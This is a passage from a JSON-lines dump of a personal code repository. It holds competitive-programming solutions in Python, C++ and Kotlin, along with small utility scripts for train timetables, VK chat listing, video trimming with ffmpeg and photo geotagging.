route found:(')\n\ndef parse(directory, fro, to, date, full, collapse, remove, st = getStations()):\n stationById, idByStation, _ = st\n x = getTimetable(idByStation[fro], idByStation[to], date)\n\n filename = directory + stationById[x['dep-st']][0] + '—' + stationById[x['arr-st']][0]\n if not (x['dat'] is None):\n filename += ', ' + x['dat']\n filename = re.sub(r'(Санкт-Петербург)-.*?\\.', r'\\1', filename)\n sys.stdout = open(filename + '.out', 'w')\n\n trains = []\n for y in x['tra-list']:\n train = dotdict(\n departure = y['tra']['dep']['tim'],\n arrival = y['tra']['arr']['tim'],\n fro = stationById[y['tra']['dep']['st']][0],\n to = stationById[y['tra']['arr']['st']][0],\n schedule = replacer(y['tra']['sch'], dayReplacers),\n type = '★' if y['tra']['typ'] == 'Ласточка' else '',\n minutes = getMins(y['tra']['tr-tim']),\n change = y['tra']['cha'].replace('. Уточните дату поездки', ''),\n skip = False\n )\n if train.schedule.find('отменен') != -1:\n continue\n trains.append(train)\n\n trains = sorted(trains, key = lambda x: (x.departure, daysSorter[x.schedule[:1].upper()]))\n averageTime = sum(map(lambda train: train.minutes, trains)) / len(trains)\n for train in trains:\n if full:\n train.time = getDate(train.minutes)\n else:\n if len(trains) > 10 and train.minutes + 4 < averageTime:\n train.time = '' if remove else getDate(train.minutes).replace(' ', '')\n elif train.minutes - 10 > averageTime:\n train.time = getDate(train.minutes)\n train.skip = True\n else:\n train.time = ''\n train.skip = train.type == '★'\n\n if remove: trains = list(filter(lambda train: not train.skip, trains))\n\n sameDep, sameDst = True, True\n if collapse:\n trains2 = []\n lastTime, lastDep = 0, 0\n for train in trains:\n if train.departure == lastDep and abs(train.minutes - lastTime) <= 2 and collapse:\n trains2[-1].fro += '/' + train.fro\n trains2[-1].to += '/' + train.to\n trains2[-1].schedule += '/' + train.schedule\n trains2[-1].type += '/' + train.type\n else:\n trains2.append(train)\n lastDep, lastTime = train.departure, train.minutes\n trains = trains2\n\n for train in trains:\n if not full:\n train.time = train.type + ' ' + train.time\n train.time = re.sub(r'^\\s*(.*?)\\s*$', r'\\1', train.time)\n train.fro = replacer(train.fro, placeReplacers)\n train.to = replacer(train.to, placeReplacers)\n\n train.fro = re.sub(r'^(\\w+)(/\\1)+$', r'\\1', train.fro)\n train.to = re.sub(r'^(\\w+)(/\\1)+$', r'\\1', train.to)\n train.time = re.sub(r'^\\s*/*\\s*$', '', train.time)\n train.fro = re.sub(r'^\\s*/*\\s*$', '', train.fro)\n train.to = re.sub(r'^\\s*/*\\s*$', '', train.to)\n if train.fro == '' and train.to == '' and (train.schedule == 'КСВ/СВ' or train.schedule == 'СВ/КСВ'): train.schedule = ''\n train.time = re.sub('^/', '❤/', train.time)\n train.time = re.sub('/$', '/❤', train.time)\n train.time = re.sub('//', '/❤/', train.time)\n for i in range(1, len(trains)):\n sameDep = sameDep and (trains[i].fro == trains[i - 1].fro)\n sameDst = sameDst and (trains[i].to == trains[i - 1].to )\n\n if full:\n fields = ['departure', 'arrival', 'schedule', 'type', 'time', 'fro', 'to', 'change']\n else:\n fields = ['departure', 'schedule', 'time']\n if not sameDep:\n fields.append('fro')\n if not sameDst:\n fields.append('to')\n\n resultedFields = []\n for f in fields:\n isNeeded = False\n for train in trains:\n isNeeded = isNeeded or train[f] != ''\n if isNeeded:\n resultedFields.append(f)\n\n for train in trains:\n print('\\t'.join(map(lambda f: train[f], resultedFields)))\n\n sys.stdout.close()\n subprocess.Popen(['mousepad', filename + '.out'])\n\[email protected]()\[email protected]('-d', '--date', type=click.DateTime(formats=[DATE_FORMAT]), help='load timetable for date=DATE')\[email protected]('-o', '--directory', type=click.Path(file_okay=False), help='output directory for timetable files', default='~/.cache/timetable')\[email protected]('-t', '--today', is_flag=True, help='load timetable for today', default=False)\[email protected]('-m', '--tomorrow', is_flag=True, help='load timetable for tomorrow', default=False)\[email protected]('-f', '--full', is_flag=True, help='do not minify', default=False)\[email protected]('-c', '--collapse', is_flag=True, help='do not collapse trains with same departure time', default=True)\[email protected]('-r', '--remove', is_flag=True, help='remove slow trains and normal lastochkas', default=True)\[email protected]('stations', type=click.Choice(getStations()[2], case_sensitive=False), required=True, nargs=-1)\ndef load(stations, directory, today, tomorrow, date, full, collapse, remove):\n if directory[-1] != os.sep:\n directory += os.sep\n if directory[0] == '~':\n directory = os.path.expanduser('~') + directory[1:]\n date = 'all' if date is None else date.strftime(DATE_FORMAT)\n if today:\n date = datetime.date.today().strftime(DATE_FORMAT)\n if tomorrow:\n date = (datetime.date.today() + datetime.timedelta(days = 1)).strftime(DATE_FORMAT)\n click.echo('Получаю расписание на ' + date)\n if full:\n collapse = False\n if len(stations) % 2 == 1:\n raise click.ClickException('Count of stations must be even')\n os.makedirs(directory, exist_ok=True)\n for i in range(0, len(stations), 2):\n parse(directory, stations[i], stations[i + 1], date, full, collapse, remove)\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.45622119307518005, "alphanum_fraction": 0.4746543765068054, "avg_line_length": 24.52941131591797, "blob_id": "0f57bc65e5a392503dcd89fbe9b71aa236b52572", "content_id": "3200f1dd72cd53b94dea140cdfa79c4da67c2a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 105, "num_lines": 17, "path": "/CodeForce/0952/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ncc = 0\n\nfor i in range(10):\n print(i)\n sys.stdout.flush()\n answer = input()\n fi = answer[:2]\n if answer == 'no':\n cc += 1\n if answer[-2:] == 'so' or answer == 'not bad' or answer == 'cool' or cc == 4 or fi == 'gr':\n print('normal')\n break\n if answer[-2:] == 'en' or answer == 'no way' or fi == 'te' or fi == 'wo' or fi == 'ar' or fi == 'go':\n print('grumpy')\n break\n" }, { "alpha_fraction": 0.3821656107902527, "alphanum_fraction": 0.5031847357749939, "avg_line_length": 25.16666603088379, "blob_id": "19d1ffd82b3a346b36a08fb2d785bb326b2cea8c", "content_id": "878aac92595264126309800ef793b7b1766dee98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 39, "num_lines": 6, "path": "/CodeForce/gym/101090/J.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nn2 = n // 2\nn12 = (n + 1) // 2\nalleven = n2 * (n2 - 1) * (n2 - 2) // 6\nevennoteven = n2 * n12 * (n12 - 1) // 2\nprint(alleven + evennoteven)\n" }, { "alpha_fraction": 0.49425286054611206, "alphanum_fraction": 0.5287356376647949, "avg_line_length": 42.5, "blob_id": "ec27baed766677685ea779ea5f337a1d56be960d", "content_id": "310fae23e79e849b66c9590a5f88c7150db496ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87, "license_type": "no_license", "max_line_length": 69, "num_lines": 2, "path": "/2020/bguirQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nprint('Yes' if len(bin(n).replace('0', '')) == 2 and n > 1 else 'No')\n" }, { "alpha_fraction": 0.523598849773407, "alphanum_fraction": 0.5435103178024292, "avg_line_length": 27.25, "blob_id": "47a1d66be4b94d51ac543685b3def6ba96cee136", "content_id": "1208f8cd2bdbea803bf778cd706f4f5dbe110510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5424, "license_type": "no_license", "max_line_length": 174, "num_lines": 192, "path": "/CodeForce/0617/E2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//MO\ninline ll hilbertOrder(int x, int y, int pow, int rotate = 0) {\n if (pow == 0) {\n return 0;\n }\n int hpow = 1 << (pow-1);\n int seg = (x < hpow) ? (\n (y < hpow) ? 0 : 3\n ) : (\n (y < hpow) ? 1 : 2\n );\n seg = (seg + rotate) & 3;\n const int rotateDelta[4] = {3, 0, 0, 1};\n int nx = x & (x ^ hpow), ny = y & (y ^ hpow);\n int nrot = (rotate + rotateDelta[seg]) & 3;\n ll subSquareSize = ll(1) << (2*pow - 2);\n ll ans = seg * subSquareSize;\n ll add = hilbertOrder(nx, ny, pow-1, nrot);\n ans += (seg == 1 || seg == 2) ? add : (subSquareSize - add - 1);\n return ans;\n}\n\ntemplate<typename S, typename T>\nstruct MO\n{\n int n;\n int w;\n int q = 0;\n vector<tuple<ll, int, int, int, T>> queries;\n vector<S> answers;\n\n const void f(const int&);\n void (*addLeft)(const int&);\n void (*addRight)(const int&);\n void (*delLeft)(const int&);\n void (*delRight)(const int&);\n S (*getAnswer)(const int&, const int&, const T&);\n\n void addQuery(int l, int r, const T& t) {\n queries.push_back({hilbertOrder(l, r, w), l, r, q++, t});\n }\n\n MO(unsigned int maxN,\n void addLeft(const int&),\n void addRight(const int&),\n void delLeft(const int&),\n void delRight(const int&),\n S getAnswer(const int&, const int&, const T&)\n ) {\n n = maxN;\n w = bit_width(maxN);\n this->addLeft = addLeft;\n this->addRight = addRight;\n this->delLeft = delLeft;\n this->delRight = delRight;\n this->getAnswer = getAnswer;\n }\n\n vector<S> go(\n ) {\n answers.resize(q);\n sort(all(queries), [&](const auto& a, const auto& b) {\n return get<0>(a) < get<0>(b);\n });\n\n int L = 0;\n int R = -1;\n\n for (int i = 0; i < q; ++i)\n {\n const auto& [_, l, r, id, t] = queries[i];\n while (L > l) addLeft(--L);\n while (R < r) addRight(++R);\n while (L < l) delLeft(L++);\n while (R > r) delRight(R--);\n answers[id] = getAnswer(l, r, t);\n }\n return answers;\n }\n};\n\n\n//}}}\n\nstatic const int N = 100'005;\nint lefts[1 << 20];\nint rights[1 << 20];\nint sums[N];\nint a[N];\nll answer = 0;\nint n, m, k;\n\ninline void addLeft(const int& x) {\n ++lefts[sums[x]];\n ++rights[sums[x + 1]];\n answer += rights[k ^ sums[x]];\n}\n\ninline void addRight(const int& x) {\n ++lefts[sums[x]];\n ++rights[sums[x + 1]];\n answer += lefts[k ^ sums[x + 1]];\n}\n\ninline void delLeft(const int& x) {\n answer -= rights[k ^ sums[x]];\n --lefts[sums[x]];\n --rights[sums[x + 1]];\n}\n\ninline void delRight(const int& x) {\n answer -= lefts[k ^ sums[x + 1]];\n --lefts[sums[x]];\n --rights[sums[x + 1]];\n}\n\nll getAnswer(const int& l, const int& r, const int&) {\n return answer;\n}\n\nvoid run()\n{\n readln(n, m, k);\n fori(n)\n readln(a[i]);\n sums[0] = 1;\n fori(n) sums[i + 1] = sums[i] ^ a[i];\n\n int l, r;\n MO<ll, int> mo(n, addLeft, addRight, delLeft, delRight, getAnswer);\n fori(m)\n readln(l, r),\n mo.addQuery(--l, --r, 0);\n\n auto ans = mo.go();\n fori(m)\n writeln(ans[i]);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5390625, "alphanum_fraction": 0.5390625, "avg_line_length": 20.16666603088379, "blob_id": "a4d4443de8cadb843563f5178358482f931e7136", "content_id": "651bb8a622fadf64c9500d5ccdc0aaf8a59e6f54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/2016/yalgo/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\ns = input()\n\nc = re.sub(r'[aeiouy]', '', s)\nv = re.sub(r'[^aeiouy]', '', s)\r\nprint('Vowel' if c < v else 'Consonant')\n" }, { "alpha_fraction": 0.4930991232395172, "alphanum_fraction": 0.5156838297843933, "avg_line_length": 28.962406158447266, "blob_id": "e4972d732d32110e1743a23e721aa1e356784f74", "content_id": "d90264af4ffc53f87f3e11db0381fbc476d85152", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3985, "license_type": "no_license", "max_line_length": 174, "num_lines": 133, "path": "/CodeForce/1783/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//downTree\n//0-indexed, [l..r)\ntemplate<typename T, typename F>\nstruct downTree {\n F f;\n vector<T> t;\n int n;\n\n downTree(int sz, const F &g, T defaultValue = T()) : f(g)\n {\n n = 1;\n while (n < sz) n <<= 1;\n t.resize(n * 2, defaultValue);\n }\n\n downTree(vector<T> &a, const F &g, T defaultValue = T()) : downTree(a.size(), g, defaultValue)\n {\n for (int i = 0; i < SZ(a); ++i)\n t[i + n] = a[i];\n for (int i = n - 1; i >= 1; --i)\n t[i] = f(t[i << 1], t[i << 1 | 1]);\n }\n\n void update(int i, const T& x)\n {\n i += n;\n t[i] = f(t[i], x);\n for (i >>= 1; i > 1; i >>= 1)\n t[i] = f(t[i << 1], t[i << 1 | 1]);\n }\n\n T get(int l, int r)\n {\n T resL = t[0];\n T resR = t[0];\n l += n;\n r += n;\n while (l < r)\n {\n if (l & 1)\n resL = f(resL, t[l++]);\n if (r & 1)\n resR = f(t[--r], resR);\n l >>= 1;\n r >>= 1;\n }\n return f(resL, resR);\n }\n};\n\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi a(n), b(n);\n readln(a, b);\n vector<int> c(n * 2 + 5);\n fori(n)\n c[b[i]] = max(c[b[i]], a[i]);\n downTree tree(c, [&](const int& a, const int& b) { return max(a, b); }, 0);\n\n vector<int> ans;\n for (int k = 1; k <= n; ++k)\n {\n bool can = true;\n for (int i = 1, poly = 1, mono = k; i <= 2 * n; i += k * 2, poly += k, mono += k)\n can &= tree.get(poly, min(n + 1, poly + k)) <= mono;\n if (can)\n ans.pb(k);\n }\n\n writeln(ans.size());\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.559374988079071, "alphanum_fraction": 0.628125011920929, "avg_line_length": 34.55555725097656, "blob_id": "9b36408ab3d05f675d37e27afe20e15a57827a05", "content_id": "d5118235d00279b0f80e7b6861be41df890c73be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 76, "num_lines": 9, "path": "/scripts/vkChats.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from vk import vk\n\nchats = vk('messages.getChat', chat_ids = ','.join(map(str, range(1, 82))))\nnames = []\nfor chat in chats:\n if set([53321, 3167759, 3586834]) == set(chat.users):\n names.append(chat['title'])\nprint('Всего чатов: {}, чатов с Антоном: {}'.format(len(chats), len(names)))\nprint('\\n'.join(names))\n" }, { "alpha_fraction": 0.4442065954208374, "alphanum_fraction": 0.4616002142429352, "avg_line_length": 28.42519760131836, "blob_id": "6a4c77e17f4bf014bceb20c39308fc25b34d1197", "content_id": "b7b57e730fc659a6d0efd1b613197843a372ac14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3737, "license_type": "no_license", "max_line_length": 131, "num_lines": 127, "path": "/CodeForce/1346/G.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nprivate fun run() {\n tailrec fun gcd(a: Int, b: Int): Int {\n return if (b == 0) a else gcd(b, a % b)\n }\n\n val (n, k) = readln()\n val p = readln()\n val a = readln()\n if (k == 2) {\n writeln(\"YES\")\n writeln(a[0], p.first())\n writeln(a[1], p.first())\n return\n }\n\n fun check(first: Int, second: Int): Pair<Pair<Int, Int>, Pair<Int, Int>> {\n var no = Pair(Pair(-1, -1), Pair(-1, -1))\n\n var s1 = first\n for (d1 in p)\n if ((second - s1) % d1 == 0) {\n var s2 = -1\n var last = -1\n var g = 0\n for (x in a)\n if ((x - s1) % d1 != 0) {\n if (last != -1)\n g = gcd(g, x - last)\n else\n s2 = x\n last = x\n }\n\n if (last == -1) // Empty\n return Pair(Pair(s1, d1), Pair(a[0], p.first()))\n if (g == 0) // One left\n return Pair(Pair(s1, d1), Pair(last, p.first()))\n for (d2 in p) // More than one left\n if (g % d2 == 0)\n return Pair(Pair(s1, d1), Pair(s2, d2))\n }\n return no\n }\n\n var os = check(a[0], a[1])\n if (os.first.first != -1) {\n writeln(\"YES\")\n writeln(os.first.first, os.first.second);\n writeln(os.second.first, os.second.second);\n return\n }\n os = check(a[0], a[2])\n if (os.first.first != -1) {\n writeln(\"YES\")\n writeln(os.first.first, os.first.second);\n writeln(os.second.first, os.second.second);\n return\n }\n os = check(a[1], a[2])\n if (os.first.first != -1) {\n writeln(\"YES\")\n writeln(os.first.first, os.first.second);\n writeln(os.second.first, os.second.second);\n return\n }\n writeln(\"NO\")\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n val t = 1\n for (q in 1..t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) = println(strings.map{if (it is IntArray) it.joinToString(\" \") else it}.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.5809524059295654, "alphanum_fraction": 0.5941392183303833, "avg_line_length": 35.878379821777344, "blob_id": "55536fb469fbe6f8164c82159348fadc7e404504", "content_id": "af593fdf7a588a9033982f5531739a0d33ecc118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2730, "license_type": "no_license", "max_line_length": 127, "num_lines": 74, "path": "/scripts/trimVideo.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport re\nimport os.path\nimport argparse\nimport sys\nimport subprocess\n\ndef getTime(kwargs):\n since = kwargs.since\n if kwargs.duration != None:\n return '-ss {0} -t {1}'.format(since, kwargs.duration)\n if kwargs.till != None:\n return '-ss {0} -to {1}'.format(since, kwargs.till)\n return '-ss {}'.format(since)\n\ndef fileExists(path):\n return os.path.exists(path)\n\ndef isUrl(url):\n ok = re.match(r'http://youtube.com/watch\\?((?:v=|\\/)([0-9A-Za-z_-]{11}).*)', url) != None or \\\n re.match(r'https://www.youtube.com/watch\\?((?:v=|\\/)([0-9A-Za-z_-]{11}).*)', url) != None or \\\n fileExists(url)\n if ok:\n return url\n raise argparse.ArgumentTypeError('{0} is not correct youtube url'.format(url))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--since', dest = 'since', type = str, default = '0' )\nparser.add_argument('-t', '--till', dest = 'till', type = str )\nparser.add_argument('-d', '--duration', dest = 'duration', type = str )\nparser.add_argument('-o', '--output', dest = 'output', type = str )\nparser.add_argument('-v', '--verbose', dest = 'verbose', action = 'store_true' )\nparser.add_argument('url', type = isUrl )\n\nargs = parser.parse_args()\ntime = getTime(args)\n\nFFMPEG = 'ffmpeg -i \"{0}\" {1} -acodec aac -b:a 192k -avoid_negative_ts make_zero \"{2}\"'\nFFMPEGAUDIO = 'ffmpeg -i \"{0}\" {1} -i \"{2}\" {1} -acodec aac -b:a 192k -avoid_negative_ts make_zero -map 0:v:0 -map 1:a:0 \"{3}\"'\n\ndef trimDigits(x):\n return int(re.split('^(\\d+)', x)[1])\n\nif not args.verbose:\n FFMPEG += ' -v fatal -stats'\n FFMPEGAUDIO += ' -v fatal -stats'\n\nif fileExists(args.url):\n download_file_path = args.url\n if args.output != None: download_file_path = args.output\n\n process_call_str = FFMPEG.format(args.url, time, download_file_path)\nelse:\n from pytube import YouTube\n yt = YouTube(args.url)\n download_file_path = '{0}.mp4'.format(yt.title)\n if args.output != None: download_file_path = args.output\n\n videos, audios = {}, {}\n for stream in yt.streams.all():\n if stream.resolution != None:\n videos[trimDigits(stream.resolution)] = stream\n if stream.abr != None:\n audios[trimDigits(stream.abr)] = stream\n video = videos[max(videos)]\n if not video.audio_codec:\n audio = audios[max(audios)]\n process_call_str = FFMPEGAUDIO.format(video.url, time, audio.url, download_file_path)\n else:\n process_call_str = FFMPEG.format(video.url, time, download_file_path)\n\nstatus = subprocess.check_call(process_call_str, shell = True)\n\n" }, { "alpha_fraction": 0.5854922533035278, "alphanum_fraction": 0.606217622756958, "avg_line_length": 26.571428298950195, "blob_id": "5c89763ed6b3256d31b4bdfc429396b237d20a1f", "content_id": "28832847be3f71cd40e7d47ac72d6d21bdca5a1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 193, "license_type": "no_license", "max_line_length": 91, "num_lines": 7, "path": "/scripts/setLocation.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\ndir=\"$2\"\n[[ -z \"$dir\" ]] && dir=\".\"\n\nlatlong=$(cat /home/igorjan/documents/geolocations.txt | grep $1 | awk '{$1=\"\"; print $0}')\necho $latlong\nupdateExif.sh $latlong \"$dir\"\n" }, { "alpha_fraction": 0.4010617733001709, "alphanum_fraction": 0.4517374634742737, "avg_line_length": 19.116504669189453, "blob_id": "0f10ac8fcf3f6ee1cc244008fad95c06d660cb80", "content_id": "224ebad4a8f6c03b9a51ef11887d37457205bf7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2072, "license_type": "no_license", "max_line_length": 79, "num_lines": 103, "path": "/2020/back/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ns = input()\nstart, finish = input().split()\n\nstart = list(map(int, start.split('-')))\nfinish = list(map(int, finish.split('-')))\n\na = [2000, 1, 1]\nif s == 'WEEK':\n a = [1999, 12, 27]\nelif s == 'FEBRUARY_THE_29TH':\n a = [1996, 2, 29]\n\ndef addMonth(d, cnt):\n for i in range(cnt):\n month = d[1]\n year = d[0]\n if month == 12:\n month = 1\n year += 1\n else:\n month += 1\n\n d = [year, month, d[2]]\n return d\n\ndays = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndef addYears(d):\n year = d[0] + 4\n if year % 100 == 0 and year % 400 != 0:\n year += 4\n return [year, d[1], d[2]]\n\ndef addDays(d, cnt):\n year, month, day = d\n day += cnt\n now = days[month]\n if month == 2 and (year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)):\n now += 1\n if day > now:\n day -= now\n month += 1\n if month == 13:\n month = 1\n year += 1\n d = [year, month, day]\n return d\n\ndef nxt(d, what):\n if s == 'WEEK':\n return addDays(d, 7)\n elif s == 'MONTH':\n return addMonth(d, 1)\n elif s == 'QUARTER':\n return addMonth(d, 3)\n elif s == 'YEAR':\n return addMonth(d, 12)\n else:\n return addYears(d)\n\ndef prv(d):\n year, month, days = d\n days -= 1\n if days == 0:\n month -= 1\n days = 28\n if month == 0:\n year -= 1\n q = [year, month, days]\n while True:\n w = addDays(q, 1)\n if w == d:\n return q\n q = w\n\nq = []\nwhile a <= start:\n a = nxt(a, s)\n\nif prv(a) >= finish:\n q.append([start, finish])\nelse:\n q.append([start, prv(a)])\n\n while True:\n b = nxt(a, s)\n if b <= finish:\n q.append([a, prv(b)])\n else:\n break\n a = b\n\n q.append([a, finish])\n\ndef get(x):\n return '0' + str(x) if x < 10 else str(x)\n\ndef frmt(d):\n return '-'.join([str(d[0]), get(d[1]), get(d[2])])\nprint(len(q))\nprint('\\n'.join(map(lambda x: ' '.join(map(frmt, x)), q)))\n" }, { "alpha_fraction": 0.30715811252593994, "alphanum_fraction": 0.31410256028175354, "avg_line_length": 16.554454803466797, "blob_id": "3ccdcc46fd4f6c16a8ad4418edd577c0b19fb84f", "content_id": "d4ac93140d176827b0e4f04a3e8e82433df93110", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2446, "license_type": "no_license", "max_line_length": 86, "num_lines": 101, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.06/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <iostream>\r\n#include <set>\r\n#include <vector>\r\n#define problem \"tree\"\r\n \r\nusing namespace std;\r\n \r\nint main()\r\n{\r\n    ios_base::sync_with_stdio(false);\r\n    